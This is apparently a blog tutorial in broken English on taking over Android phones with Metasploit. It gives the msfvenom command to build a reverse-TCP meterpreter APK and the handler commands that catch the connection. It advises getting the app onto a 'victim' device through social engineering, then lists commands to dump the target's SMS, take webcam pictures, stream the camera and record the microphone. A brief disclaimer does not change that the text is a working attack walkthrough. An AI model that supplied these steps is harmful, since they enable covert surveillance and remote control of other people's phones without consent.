Pentesting With Kali Linux




Now I will create a post remote Android with Metasploit.
Earlier there were some terms that should be noted:

1. Targets should be in one network, meaning that the Target should be in a wifi connection with us.
2. The operating system KALI LINUX or Windows

Tested on:
most low android jellybean
failed on android gingerbread

* WARNING!: this is just a learning to add science, I as admin is not responsible if there are things that are not in want.



Step By Step:
1. first you need to Connect to the Wifi.
2. Open a terminal and type ifconfig, and copy your ip.


2. next we will make to create a payload format
msfvenom -p android/meterpreter/reverse_tcp lhost=ip kalian lport=4444 R > /root/file.apk

Description of the Commands above:
msfvenom : generator payload
-p :
payload
android/meterpreter/reverse_tcp : the used exploit
lhost= : your IP
lport=
: used 4444
R > /root/file.apk
: place put the output and file name.

Note: If the "msfvenom" can not, please try to replace with "msfpayload".


3. Send the File in generate, how do I? Please you do try teknisk social or other languages is meniu target.
If already posted live install in device of the victim.

4. input the command "msfconsole":


If it is open, then typed these commands sequentially:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.175
( your IP )
set lport 4444
exploit

5. wait or send the victim Open applications install, already in the last reply victims already open the application it will pop up display as below:


6. It's been opened? Congratulations you can already enter into android Guys, once you've signed in, then there are some commands:

dump_sms = sms to collect all target
webcam_snap = to open android camera target
webcam_stream = to see activity via the android camera target
record_mic = to record the sound of the target
help = to see other commands
exit = exit metasploit

whether android could only made like that?
not only does android can we make as above, operating systems windows, mac, linux, mobile java could also be clearer, or to his "msfvenom -l" to see a list of the exploit.

Message:
Do Not Install Applications From Untrusted Sources.

If there is a less obvious, please write in the comments field



Next
Previous
Click here for Comments

0 comments: